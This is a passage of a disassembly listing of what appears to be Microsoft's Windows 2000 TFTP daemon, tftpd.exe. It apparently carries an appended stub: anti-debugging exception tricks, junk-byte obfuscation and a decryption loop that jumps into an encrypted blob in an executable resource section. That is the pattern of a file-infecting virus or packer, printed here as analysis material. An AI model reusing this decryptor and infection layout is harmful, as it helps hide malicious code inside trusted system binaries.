					; sub_10039D6+4Dj
		push	1
		pop	eax
		jmp	short loc_1003A38
; ---------------------------------------------------------------------------


loc_1003A2E:				; CODE XREF: sub_10039D6+Cj
		mov	ecx, [ebp+arg_4]
		xor	eax, eax
		cmp	[ecx], al
		setz	al


loc_1003A38:				; CODE XREF: sub_10039D6+51j
					; sub_10039D6+56j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_10039D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A3E	proc near		; CODE XREF: sub_1001A91+5p
					; sub_100230A+8p ...
		jmp	ds:dword_100116C
sub_1003A3E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A44	proc near		; CODE XREF: sub_10018DB+FEp
					; sub_1002219+DAp
		jmp	ds:dword_1001138
sub_1003A44	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003A4A	proc near		; CODE XREF: sub_1001FA6+1Fp
					; sub_1001FA6+43p
		jmp	ds:dword_100113C
sub_1003A4A	endp

; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	offset dword_1001560
		push	offset loc_1003BF0
		mov	eax, large fs:0
		push	eax
		mov	large fs:0, esp
		add	esp, 0FFFFFFE0h
		push	ebx
		push	esi
		push	edi
		mov	[ebp-18h], esp
		mov	dword ptr [ebp-4], 0
		push	1
		call	ds:dword_10010C4
		add	esp, 4
		mov	dword_10062D0, 0FFFFFFFFh
		mov	dword_10062D4, 0FFFFFFFFh
		call	ds:dword_10010C8
		mov	ecx, dword_100600C
		mov	[eax], ecx
		call	ds:dword_10010CC
		mov	edx, dword_1006008
		mov	[eax], edx
		mov	eax, ds:dword_10010D0
		mov	ecx, [eax]
		mov	dword_10062D8, ecx
		call	nullsub_2
		mov	eax, dword_1005DC4
		test	eax, eax
		jnz	short loc_1003AE1
		push	offset loc_1003BD0
		call	ds:dword_1001084
		add	esp, 4


loc_1003AE1:				; CODE XREF: .text:01003AD1j
		call	sub_1003BB0
		push	offset dword_100500C
		push	offset dword_1005008
		call	sub_1003BA6
		add	esp, 8
		mov	edx, dword_1006004
		mov	[ebp-28h], edx
		lea	eax, [ebp-28h]
		push	eax
		mov	ecx, dword_1006000
		push	ecx
		lea	edx, [ebp-20h]
		push	edx
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-1Ch]
		push	ecx
		call	ds:dword_1001080
		add	esp, 14h
		push	offset dword_1005004
		push	offset dword_1005000
		call	sub_1003BA6
		add	esp, 8
		call	ds:dword_10010D8
		mov	edx, [ebp-20h]
		mov	[eax], edx
		mov	eax, [ebp-20h]
		push	eax
		mov	ecx, [ebp-2Ch]
		push	ecx
		mov	edx, [ebp-1Ch]
		push	edx
		call	sub_1001570
		add	esp, 0Ch
		mov	[ebp-24h], eax
		push	eax
		call	ds:dword_10010EC
		jmp	short loc_1003B80
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-30h], ecx
		push	eax
		push	ecx
		call	sub_1003BA0
		add	esp, 8
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		mov	edx, [ebp-30h]
		push	edx
		call	ds:dword_10010DC+4


loc_1003B80:				; CODE XREF: .text:01003B5Cj
		add	esp, 4
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		mov	ecx, [ebp-10h]
		mov	large fs:0, ecx
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA0	proc near		; CODE XREF: .text:01003B6Ap
		jmp	ds:dword_10010DC
sub_1003BA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BA6	proc near		; CODE XREF: .text:01003AF0p
					; .text:01003B2Bp
		jmp	ds:dword_100107C
sub_1003BA6	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_1003BB0	proc near		; CODE XREF: .text:loc_1003AE1p
		push	30000h
		push	10000h
		call	sub_1003BF6
		add	esp, 8
		retn
sub_1003BB0	endp

; ---------------------------------------------------------------------------
		align 10h


loc_1003BD0:				; DATA XREF: .text:01003AD3o
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------
		align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
		align 10h


loc_1003BF0:				; DATA XREF: .text:01003A5Ao
		jmp	ds:dword_10010C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_1003BF6	proc near		; CODE XREF: sub_1003BB0+Ap
		jmp	ds:dword_10010BC
sub_1003BF6	endp

; ---------------------------------------------------------------------------
		dd 3D7Ch, 2 dup(0FFFFFFFFh), 3E60h, 10F4h, 3CA4h, 2 dup(0FFFFFFFFh)
		dd 4012h, 101Ch, 3C88h,	2 dup(0FFFFFFFFh), 40A2h, 1000h
		dd 3DCCh, 2 dup(0FFFFFFFFh), 4172h, 1144h, 3DC0h, 2 dup(0FFFFFFFFh)
		dd 41A2h, 1138h, 3D04h,	2 dup(0FFFFFFFFh), 42F6h, 107Ch
		dd 5 dup(0)
		dd 4092h, 4020h, 407Eh,	4070h, 4052h, 403Eh, 0
		dd 3E6Ch, 3FF6h, 3FE6h,	3FCEh, 3FBEh, 3FB2h, 3FA2h, 3E7Ah
		dd 3E8Ah, 3EA0h, 3EB0h,	3ECCh, 3EDAh, 3EF2h, 3EFEh, 3F0Ch
		dd 3F24h, 3F3Ch, 3F56h,	3F62h, 3F70h, 3F78h, 3F92h, 0
		dd 4282h, 4272h, 428Eh,	4230h, 4226h, 421Eh, 4214h, 420Ah
		dd 4200h, 41F8h, 41F0h,	41E6h, 41DCh, 41D2h, 41CAh, 41C2h
		dd 4302h, 42E2h, 42D0h,	42C2h, 42B2h, 42A2h, 41B8h, 4262h
		dd 4254h, 424Ch, 423Ah,	4242h, 41B0h, 0
		dd 3E52h, 8000006Fh, 80000073h,	3E08h, 80000009h, 3E1Ah
		dd 8000000Fh, 3E34h, 8000000Ah,	3E42h, 80000003h, 8000000Ch
		dd 80000002h, 80000037h, 80000017h, 80000014h, 0
		dd 417Ch, 4190h, 0
		dd 4126h, 4168h, 415Eh,	4154h, 4142h, 4130h, 411Ah, 4112h
		dd 410Ah, 40F4h, 40EAh,	40D4h, 40B0h, 40C2h, 0
		dd 53570019h, 65764541h, 6553746Eh, 7463656Ch, 1B0000h
aWsagetoverlapp	db 'WSAGetOverlappedResult',0
		align 4
a2		db '2',0
aWsarecvfrom	db 'WSARecvFrom',0
		dw 0Fh
aWsacloseevent	db 'WSACloseEvent',0
		db '=',0
aWsasocketa	db 'WSASocketA',0
		align 10h
aWs2_32_dll	db 'WS2_32.dll',0
		align 4
aM		db 'Œ',0
aExitprocess	db 'ExitProcess',0
		dw 12Dh
aGetlasterror	db 'GetLastError',0
		align 2
		dw 2FDh
aWaitforsingleo	db 'WaitForSingleObject',0
a4		db '4',0
aCreateeventa	db 'CreateEventA',0
		align 10h
		db 0C5h	; Å
		db 1, 49h, 6Eh
aItializecritic	db 'itializeCriticalSection',0
		dd 654801B6h, 72437061h, 65746165h, 1DE0000h
aLeavecriticals	db 'LeaveCriticalSection',0
		align 2
		dw 1BAh
aHeapfree	db 'HeapFree',0
		align 2
		dw 1Eh
aClosehandle	db 'CloseHandle',0
aO		db 'o',0
aEntercriticals	db 'EnterCriticalSection',0
		align 4
		retf
; ---------------------------------------------------------------------------
		db 1, 49h, 6Eh
aTerlockedincre	db 'terlockedIncrement',0
		align 4
		db 0FBh	; û
		db 2, 57h, 61h
aItformultipleo	db 'itForMultipleObjects',0
		align 2
		dw 1B4h
aHeapalloc	db 'HeapAlloc',0
		dw 252h
aResetevent	db 'ResetEvent',0
		align 10h
		retn
; ---------------------------------------------------------------------------
		db 2, 53h, 6Ch
		db  65h	; e
		db 65h,	70h, 0
		db 0D8h	; Ø
		db 2, 54h, 72h
aYentercritical	db 'yEnterCriticalSection',0
		dw 2C5h
aSuspendthread	db 'SuspendThread',0
		dw 254h
aResumethread	db 'ResumeThread',0
		db 0, 90h, 2
aSetevent	db 'SetEvent',0
		align 2
		dw 29Ch
aSetlasterror	db 'SetLastError',0
		align 2
aZ		db 'Z',0
aDeletecritical	db 'DeleteCriticalSection',0
		dw 12Fh
aGetlocaltime	db 'GetLocalTime',0
		align 2
aP		db '',0
aExpandenvironm	db 'ExpandEnvironmentStringsA',0
aKernel32_dll	db 'KERNEL32.dll',0
		align 10h
		db 0E5h	; å
		db 1, 53h, 74h
aArtservicectrl	db 'artServiceCtrlDispatcherA',0
		dw 1DFh
aSetservicestat	db 'SetServiceStatus',0
		align 2
		dw 1B9h
aRegisterservic	db 'RegisterServiceCtrlHandlerA',0
		db  84h	; „
		db 1, 52h, 65h
aGclosekey	db 'gCloseKey',0
		dw 1A7h
aRegqueryvaluee	db 'RegQueryValueExA',0
		align 2
		dw 19Dh
aRegopenkeyexa	db 'RegOpenKeyExA',0
aAdvapi32_dll	db 'ADVAPI32.dll',0
		align 10h
		db  50h	; P
		db 2, 52h, 74h
aLregisterwait	db 'lRegisterWait',0
		dw 184h
aRtlcreatetimer	db 'RtlCreateTimer',0
		align 4
		db  85h	; …
		db 1, 52h, 74h
aLcreatetimerqu	db 'lCreateTimerQueue',0
		dw 42Eh
a_chkstk	db '_chkstk',0
		db 0A1h	; ¡
		db 1, 52h, 74h
aLderegisterwai	db 'lDeregisterWaitEx',0
		dw 433h
a_itoa		db '_itoa',0
		dw 450h
aAtoi		db 'atoi',0
		align 2
		dw 43Dh
a_stricmp	db '_stricmp',0
		align 2
		dw 46Dh
aMemmove	db 'memmove',0
		dd 7452019Dh, 6C65446Ch, 54657465h, 72656D69h, 2990000h
		dd 556C7452h, 74616470h, 6D695465h, 7265h, 6F740486h, 65776F6Ch
		dd 45F0072h, 70757369h,	726570h, 7473047Dh, 70636E72h
		dd 746E0079h, 2E6C6C64h, 6C6C64h, 6F4E004Fh, 79666974h
		dd 72646441h, 6E616843h, 6567h,	65470022h, 41704974h, 54726464h
		dd 656C6261h, 70690000h, 61706C68h, 642E6970h, 6C6Ch, 78650246h
		dd 7469h, 7270029Bh, 66746E69h,	2430000h, 6D697463h, 2540065h
		dd 65706F66h, 17F006Eh,	646B6D5Fh, 7269h, 655F00C5h, 6F6E7272h
		dd 0AA0000h, 6468635Fh,	7269h, 697402CDh, 656Dh, 7266025Bh
		dd 6565h, 63660249h, 65736F6Ch,	2A40000h, 6C616572h, 636F6Ch
		dd 616D028Eh, 636F6C6Ch, 1950000h, 6165725Fh, 0B00064h
		dd 6F6C635Fh, 6573h, 6C5F0141h,	6B656573h, 1840000h, 65706F5Fh
		dd 214006Eh, 6972775Fh,	6574h, 655F00D0h, 746978h, 585F0048h
		dd 46747063h, 65746C69h, 630072h, 5F705F5Fh, 6E695F5Fh
		dd 6E657469h, 580076h, 65675F5Fh, 69616D74h, 6772616Eh
		dd 10C0073h, 696E695Fh,	72657474h, 82006Dh, 65735F5Fh
		dd 65737574h, 74616D72h, 72726568h, 9B0000h, 6A64615Fh
		dd 5F747375h, 76696466h, 690000h, 5F705F5Fh, 6D6F635Fh
		dd 65646F6Dh, 6E0000h, 5F705F5Fh, 6F6D665Fh, 6564h, 5F5F0080h
		dd 5F746573h, 5F707061h, 65707974h, 0C70000h, 6378655Fh
		dd 5F747065h, 646E6168h, 3372656Ch, 534D0000h, 54524356h
		dd 6C6C642Eh, 0B40000h,	6E6F635Fh, 6C6F7274h, 7066h

; =============== S U B	R O U T	I N E =======================================



sub_1004310	proc near		; CODE XREF: .text:01004366p
		pusha
		push	ebp
		mov	ebp, esp
		call	loc_100432D
		call	sub_10043B7
		push	dword ptr fs:0
		pop	ebp
		lea	ebp, [ebp+8]
		jmp	near ptr loc_100436B+1
sub_1004310	endp

; ---------------------------------------------------------------------------


loc_100432D:				; CODE XREF: sub_1004310+4p
		push	dword ptr fs:0
		mov	fs:0, esp
		xor	eax, eax
		push	eax
		push	100h
		push	80000000h
		push	80000000h
		push	80000000h
		push	eax
		push	80000000h
		push	1000h
		push	80000000h
		push	eax
		push	80000000h
		call	sub_1004310


loc_100436B:				; CODE XREF: sub_1004310+18j
		add	[ecx], ebp
		sar	dh, 0C8h	; CODE XREF: .text:01004374j
		or	al, al
		jz	short loc_1004378
		jnz	short near ptr loc_100436D+1
		jmp	short near ptr byte_10043DF
; ---------------------------------------------------------------------------


loc_1004378:				; CODE XREF: .text:01004372j
		sub	edi, edi
		sub	ecx, ecx
		mov	cl, 0E8h


loc_100437E:				; CODE XREF: .text:0100437Fj
		inc	edi
		loop	loc_100437E
		call	$+5
		pop	ecx
		add	ecx, 307Ah
		push	ecx
		mov	edx, 24F0h


loc_1004393:				; CODE XREF: .text:010043A0j
		mov	al, [ecx]
		sub	ax, di
		xchg	al, [ecx]
		inc	ecx
		inc	edi
		dec	edx
		cmp	edx, 0
		ja	short loc_1004393
		pop	ecx
		mov	esp, fs:0
		pop	dword ptr fs:0
		leave
		mov	[esp+18h], ecx
		popa
		jmp	ecx

; =============== S U B	R O U T	I N E =======================================



sub_10043B7	proc near		; CODE XREF: sub_1004310+9p

arg_C		= dword	ptr  10h

		mov	eax, [esp+arg_C]
		pop	dword ptr [eax+0B8h]
		xor	eax, eax
		retn
sub_10043B7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 6 dup(?)
		db 3 dup(?)
byte_10043DF	db ?			; CODE XREF: .text:01004376j
		dd 8 dup(?)
_text		ends

; Section 2. (virtual address 00005000)
; Virtual size			: 000012DC (   4828.)
; Section size in file		: 000012DC (   4828.)
; Offset to raw	data for section: 00005000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 1005000h
dword_1005000	dd 0		dword_1005004	dd 0		dword_1005008	dd 0		dword_100500C	dd 0		asc_1005010	db ' ================================================================'
					; DATA XREF: sub_1001570+4Do
		db '======== ',0Ah
		db 'Abstract:                                                        '
		db '         ',0Ah
		db ' This implements an RFC 783 tftp daemon.                         '
		db '         ',0Ah
		db ' It listens on port 69 for requests                              '
		db '         ',0Ah
		db ' and spawns a thread to process each request.                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'TFTPD USAGE and Installation:                                    '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db '  md d:/tftpd                                     (the StartDirec'
		db 'tory).   ',0Ah
		db '  copy //MohsinA_p90/test/tftpd.exe .                            '
		db '         ',0Ah
		db '  sc create tftpd binPath= d:/tftpd/tftpd.exe     (give full path'
		db ').       ',0Ah
		db '  sc query tftpd                                  (check if insta'
		db 'lled).   ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Start:                                                           '
		db '         ',0Ah
		db '    sc start tftpd -f                             (creates a log '
		db 'file).   ',0Ah
		db 'or  sc start tftpd                                               '
		db '         ',0Ah
		db 'or  net start tftpd                                              '
		db '         ',0Ah
		db 'or  sc start tftpd [-dStartDirectory] [-e] [-f]                  '
		db '         ',0Ah
		db '    Options: -e  use event log.                                  '
		db '         ',0Ah
		db '             -f  log to file.                                    '
		db '         ',0Ah
		db '             -dStartDirectory                                    '
		db '         ',0Ah
		db 'Info:                                                            '
		db '         ',0Ah
		db '  sc interrogate tftpd           (logs will be updated).         '
		db '         ',0Ah
		db '  sc query tftpd                 Check whether running.          '
		db '         ',0Ah
		db 'Stop:                                                            '
		db '         ',0Ah
		db '  sc  stop tftpd                                                 '
		db '         ',0Ah
		db '  net stop tftpd                                                 '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Variables that control what files can be read/written and by whom'
		db ':        ',0Ah
		db '   StartDirectory - only files there will be accessible.         '
		db '         ',0Ah
		db '                    LogFile is created here.                     '
		db '         ',0Ah
		db '   ValidClients - Clients matching this ip address can read files'
		db '.        ',0Ah
		db '                    eg. you can set it to "157.55.8?.*"          '
		db '       ',0Ah
		db '   ValidMasters   - clients matching this can write and read file'
		db 's.       ',0Ah
		db '                    eg. you can set it to "" and no one can write'
		db '.      ',0Ah
		db '   ValidReadFiles - only matching files will be served out, eg. "'
		db 'r*.t?t"',0Ah
		db '   ValidWriteFiles- only matching files will be accepted,  eg. "w'
		db '*.txt" ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db 'Client:                                                          '
		db '         ',0Ah
		db '  tftp [-i] servername {get|put} src_file dest_file              '
		db '         ',0Ah
		db '  -i from binary mode, else ascii mode is used.                  '
		db '         ',0Ah
		db '                                                                 '
		db '         ',0Ah
		db ' ================================================================'
		db '======== ',0Ah,0
		align 8
aTftpd		db 'Tftpd',0            ; DATA XREF: sub_1001665+Bo
					; .data:off_1005CB0o
		align 10h
off_1005CB0	dd offset aTftpd	; DATA XREF: sub_1001570:loc_1001646o
					; "Tftpd"
		dd offset sub_1001665
		align 10h
off_1005CC0	dd offset aErrorUndefined ; DATA XREF: sub_100230A+73r
					; "Error undefined"
		dd offset aFileNotFound	; "File	not found"
		dd offset aAccessViolatio ; "Access violation"
		dd offset aDiskFullOrAllo ; "Disk full or allocation exceeded"
		dd offset aIllegalTftpOpe ; "Illegal TFTP operation"
		dd offset aUnknownTransfe ; "Unknown transfer ID"
		dd offset aFileAlreadyExi ; "File already exists"
		dd offset aNoSuchUser	; "No such user"
		dd offset aOptionNegotiat ; "Option negotiation	failure"
		align 8
dword_1005CE8	dd 2Ah,	0Dh dup(0)					; sub_10037BF+87o
dword_1005D20	dd 2Ah,	0Dh dup(0)					; sub_100333A+163o ...
dword_1005D58	dd 2Ah,	0Dh dup(0)					; sub_10037BF+EAo
dword_1005D90	dd 2Ah,	0Ch dup(0)					; sub_10037BF+11Ao
dword_1005DC4	dd 1				align 10h
dword_1005DD0	dd 0							; sub_1001E73:loc_1001F36r ...
dword_1005DD4	dd 0		dword_1005DD8	dd 0							; sub_1001665:loc_100182Er ...
dword_1005DDC	dd 0							; sub_1001665+8Br ...
dword_1005DE0	dd 0							; sub_1001E73:loc_1001F0Cr ...
		align 8
dword_1005DE8	dd 0							; sub_1001A91+2B3o
dword_1005DEC	dd 0							; sub_1001A1F+52r ...
dword_1005DF0	dd 0							; sub_1001A1F+5Ew ...
dword_1005DF4	dd 0							; sub_1001A91+59w ...
dword_1005DF8	dd 0							; sub_10018DB+EFr
dword_1005DFC	dd 0		dword_1005E00	dd 0							; sub_1002219+D5o
		db 3 dup(0)
dword_1005E07	dd 0							; sub_1003910+6Br ...
		align 4
		dd 7Ch dup(0)
dword_1005FFC	dd 0		dword_1006000	dd 0		dword_1006004	dd 0		dword_1006008	dd 0		dword_100600C	dd 0				dd 4 dup(0)
dword_1006020	dd 6 dup(0)						; .text:01001D78o ...
dword_1006038	dd 0							; sub_10018DB+34w ...
dword_100603C	dd 0		dword_1006040	dd 0							; sub_1001DEB:loc_1001E35r
dword_1006044	dd 0							; sub_1001665+DBr ...
dword_1006048	dd 6 dup(0)	dword_1006060	dd 6 dup(0)						; sub_1001A1F+2o ...
dword_1006078	dd 0							; sub_10019F0+Fw ...
dword_100607C	dd 0		dword_1006080	dd 6 dup(0)						; sub_100287F+1o ...
dword_1006098	dd 0							; sub_10018DB+25w ...
dword_100609C	dd 0		dword_10060A0	dd 0							; sub_10018DB+A2r ...
		dd 7 dup(0)
dword_10060C0	dd 0							; sub_1001665:loc_1001857o
dword_10060C4	dd 0		dword_10060C8	dd 0		dword_10060CC	dd 0				dd 0Ch dup(0)
dword_1006100	dd 4 dup(0)						; sub_1002219:loc_10022E9o
dword_1006110	dd 0				align 10h
dword_1006120	dd 0							; sub_1001665+63o ...
dword_1006124	dd 0							; sub_1001665+D1w ...
dword_1006128	dd 0							; sub_1001665+E1w
dword_100612C	dd 0							; sub_1001E73+5Aw ...
dword_1006130	dd 0							; sub_1001E73+60w ...
dword_1006134	dd 0							; sub_1001665+EBw ...
dword_1006138	dd 0							; sub_1001665+F1w ...
		align 10h
dword_1006140	dd 64h dup(0)	dword_10062D0	dd 0		dword_10062D4	dd 0		dword_10062D8	dd 0				align 200h
_data		ends

; Section 3. (virtual address 00007000)
; Virtual size			: 0000E400 (  58368.)
; Section size in file		: 0000E400 (  58368.)
; Offset to raw	data for section: 00007000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_rsrc		segment	para public 'CODE' use32
		assume cs:_rsrc
		;org 1007000h
		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
		dd 3 dup(0)
		dd 10000h, 10h,	80000018h, 3 dup(0)
		dd 10000h, 1, 80000030h, 3 dup(0)
		dd 10000h, 409h, 48h, 7060h, 374h, 4 dup(0)
		dd 340374h, 560000h, 5F0053h, 450056h, 530052h,	4F0049h
		dd 5F004Eh, 4E0049h, 4F0046h, 0
		dd 0FEEF04BDh, 10000h, 50000h, 8560001h, 50000h, 8560001h
		dd 3Fh,	0
		dd 40004h, 1, 3	dup(0)
		dd 2D4h, 530001h, 720074h, 6E0069h, 460067h, 6C0069h, 490065h
		dd 66006Eh, 6Fh, 2B0h, 300001h,	300034h, 300039h, 420034h
		dd 30h,	16004Ch, 430001h, 6D006Fh, 610070h, 79006Eh, 61004Eh
		dd 65006Dh, 0
aMicrosoftCorpo:
		unicode	0, <Microsoft Corporation>,0
aR:
		unicode	0, <r%>
		dd 460001h, 6C0069h, 440065h, 730065h, 720063h,	700069h
		dd 690074h, 6E006Fh, 0
aTcpIpTrivialFi:
		unicode	0, <TCP/IP Trivial file	transfer daemon.>,0
		align 4
a8		db '8',0
		dw 0Ch
		dd 460001h, 6C0069h, 560065h, 720065h, 690073h,	6E006Fh
		dd 0
a5_00_2134_1:
		unicode	0, <5.00.2134.1>,0
a4_0:
		unicode	0, <4>
		dw 0Ah
		dd 490001h, 74006Eh, 720065h, 61006Eh, 4E006Ch,	6D0061h
		dd 65h,	660074h, 700074h, 2E0064h, 780065h, 65h, 280074h
		dd 4C0001h, 670065h, 6C0061h, 6F0043h, 790070h,	690072h
		dd 680067h, 74h, 6F0043h, 790070h, 690072h, 680067h, 200074h
		dd 430028h, 200029h, 69004Dh, 720063h, 73006Fh,	66006Fh
		dd 200074h, 6F0043h, 700072h, 20002Eh, 390031h,	310038h
		dd 31002Dh, 390039h, 39h, 0A003Ch, 4F0001h, 690072h, 690067h
		dd 61006Eh, 46006Ch, 6C0069h, 6E0065h, 6D0061h,	65h, 660074h
		dd 700074h, 2E0064h, 780065h, 65h, 2F007Eh, 500001h, 6F0072h
		dd 750064h, 740063h, 61004Eh, 65006Dh, 0
aMicrosoftRWind:
		unicode	0, <Microsoft(R) Windows (R) 2000 Operating System>,0
		align 4
		db '<',0
		dw 0Ch
		dd 500001h, 6F0072h, 750064h, 740063h, 650056h,	730072h
		dd 6F0069h, 6Eh, 2E0035h, 300030h, 32002Eh, 330031h, 2E0034h
		dd 31h,	44h, 560001h, 720061h, 690046h,	65006Ch, 6E0049h
		dd 6F0066h, 0
		dd 40024h, 540000h, 610072h, 73006Eh, 61006Ch, 690074h
		dd 6E006Fh, 0
		dd 4B00409h, 0Bh dup(0)
		dd 0EBEAD178h, 0F379EDECh, 1E72E814h, 0F7F6F518h, 847AF9F8h
		dd 0FF27A994h, 275E8C00h, 3337908h, 0BBBA9261h,	980E0D35h
		dd 133BC5C8h, 46CE9514h, 31A193Ch, 0B7212A91h, 23224550h
		dd 262880AFh, 0B632145Bh, 2F525EC4h, 8E653030h,	0A3B7CA89h
		dd 3B3F3D5Ch, 22BF3D3Ch, 42413140h, 574C32C5h, 0C7D54988h
		dd 4DB5170h, 5392858Ch,	5756550Dh, 0DCFE4C58h, 0C7B2ABD7h
		dd 70D7D4C9h, 0F4A2A8EFh, 0ECD0816Ch, 0E3B3BDA4h, 735DF278h
		dd 0EC767575h, 0F3CA045Ah, 0F109507Fh, 9BCC0CA0h, 34D77887h
		dd 30B4C8Bh, 0F4D58D8Bh, 14AD0604h, 9E6980Ch, 0AD0FFC07h
		dd 0E0A5151Dh, 18140504h, 0B21E26ADh, 0AB1D1C0Dh, 8690B220h
		dd 0DC750E09h, 2941D9C0h, 0AEBD12DCh, 0DC274CBh, 0C6DE3B4Bh
		dd 4EFA50BFh, 0D7B2BCCBh, 12CECDCCh, 3845403Ch,	3B44361Ch
		dd 2EDA3E44h, 6467B3DBh, 0E322161Ch, 0E7E6F2CCh, 505C2CE8h
		dd 3453614Dh, 67605666h, 0F649F535h, 3B7F82CEh,	0E7FE3D31h
		dd 302010Dh, 537A6A4Bh,	507E7C69h, 817D7F7Eh, 0E9116410h
		dd 4C5A9A9Dh, 8B021958h, 0A41E1D1Ch, 734395E0h,	5C6ABA23h
		dd 0EBAF2968h, 0B4BB3DA1h, 33724202h, 1F3585BEh, 3B3A39A6h
		dd 0D43DB927h, 4382767Ch, 7B77CA3Bh, 4B4A4988h,	6DC2CD4Ch
		dd 878706DDh, 0D3E15594h, 0FE5D7Ch, 9810FAE7h, 18ED61A0h
		dd 67A69E1Ah, 0A42426F3h, 32CB6DACh, 0DD72DBCAh, 0E176DF74h
		dd 7B7BE178h, 43097D80h, 0EDD281EAh, 864A1090h,	0EADEDF6Ah
		dd 0C28E8DBFh, 926C7959h, 2C239493h, 9BDAAA39h,	0EFEFEEEEh
		dd 0D8E2369Fh, 6B29A5E4h, 9D346CC8h, 0AFD00C65h, 0F3C2E1B0h
		dd 0B0988BB6h, 0E4FF7F7Bh, 635CCA8Eh, 0FB15742Ah, 9BD4CD5Bh
		dd 0C4788EE1h, 5E0C45BEh, 2F34721Fh, 357D70B6h,	9E804AD3h
		dd 3858373h, 9046A40Ah,	3D42EC8Eh, 98CFAB82h, 73B533D3h
		dd 7EEAA37Ah, 0DE23E258h, 804179F2h, 6369CD63h,	8AC53EEAh
		dd 6E948D1Bh, 3F2576DBh, 44CCC513h, 0B29A0964h,	62C73D76h
		dd 0A74DED07h, 1A14B6AEh, 1F0415C5h, 7AEBADE6h,	5A50F3F6h
		dd 83ACFD5Dh, 0C51093Ah, 0AB2412A6h, 0C7E9078Ah, 9A1CAF8Eh
		dd 3F05393Fh, 221412C6h, 5E22DA66h, 13C99h, 6F68D11Ah
		dd 972D9CBDh, 28E01948h, 83EC355Bh, 6285DE8Ah, 0CE34ADB4h
		dd 9A6E4867h, 0A7E3850Ah, 8F97C950h, 40315A6Fh,	7AC03918h
		dd 2C2090F5h, 0FE0A213Dh, 0DE6C24A2h, 1E306AA2h, 53193533h
		dd 4FA424DAh, 0C7777D7Bh, 0CE935770h, 2DBCCFA1h, 9BD8B94Bh
		dd 0BBCCAD66h, 7E104A82h, 0B3F99513h, 60806BAh,	4206225Ah
		dd 9780237Dh, 5F9CD5F6h, 40B81B2Ah, 851F092Eh, 0B818F963h
		dd 0CA0C467Eh, 2F35912Fh, 0B3A95B6h, 0B45399D3h, 43BCCA1Eh
		dd 5F98D6A2h, 5180C626h, 9776C88Dh, 9DE2C817h, 5375A070h
		dd 16241D8Bh, 0ACBF3C43h, 231CAA9Eh, 0EF4C0EAh,	0C3773C00h
		dd 77B0E924h, 0D708B988h, 1C3B2116h, 0CBC432FEh, 0F68F0E0Fh
		dd 4C4B75EEh, 0EC08EE47h, 4625ADA6h, 594A7171h,	282BE51Eh
		dd 8F081622h, 0AE601C56h, 427338FCh, 23290913h,	0C810AAh
		dd 2EE11251h, 0B4F7A922h, 53CC9AA6h, 0E6A93185h, 0CBB39FBBh
		dd 0EF5DA452h, 0FAFCF583h, 5C9B52BAh, 0FBF4A00Fh, 4A41639h
		dd 3C8BA59Eh, 0C68992E5h, 2B93139Bh, 6C2EE132h,	1851E4A9h
		dd 0BFB80724h, 0DB6A8C0Dh, 0A7E3C274h, 16ED08C2h, 0F867E1B0h
		dd 7584D7C9h, 0EE4D66FAh, 0FCBCB523h, 9FD81156h, 0B76901EDh
		dd 7E43073Fh, 78838BB9h, 0F484EBEh, 967E9DD6h, 0E27C006Fh
		dd 8130B91Ch, 99CF9381h, 8486E546h, 0EB772962h,	8F8345A4h
		dd 0EF106170h, 353C7DB6h, 1AE6A92h, 0D03F65F8h,	5FD8A6AAh
		dd 0BBF070FEh, 9779D71Ah, 9D18A05Eh, 0A9CCCC7Ah, 9524F7D6h
		dd 726CBB0h, 233553B6h,	7078DBEAh, 0B2E43C6Ch, 379D0D97h
		dd 10F5B43Eh, 0CE6430C5h, 5027ECB3h, 0A73059E7h, 0D88FEAEh
		dd 36DF91CAh, 20F55255h, 5750D902h, 7F606AABh, 0EF9B017Ah
		dd 0A384B2E3h, 0AECE39B2h, 2329C103h, 0FF2219AAh, 2888DC6h
		dd 0E79D543Dh, 0C1A5572Eh, 0CE854DF3h, 0AF6553DBh, 0A721FEE7h
		dd 8B69849Eh, 5818117Fh, 3B61A92Bh, 311CD9C2h, 0AA6FBFBEh
		dd 0F952D8Fh, 22646216h, 0E14A3847h, 2E864B4Ch,	0F1F95BBEh
		dd 0DB145E6Eh, 0B34D3CA2h, 725927E3h, 7D51F3AAh, 6A21D99Fh
		dd 0CEEAD9B7h, 43C9B1A3h, 4D949C4Ah, 0E9C48338h, 0A79D0835h
		dd 762CA573h, 5673717Eh, 0EB51896Bh, 0A18023F2h, 9309A40Ch
		dd 0C8B8311Fh, 9BD40E6Eh, 309114D5h, 2238298Ah,	0FCCCD605h
		dd 99337D76h, 55943E51h, 0F7CB52Eh, 0AF05F05Dh,	0F8B42D5Bh
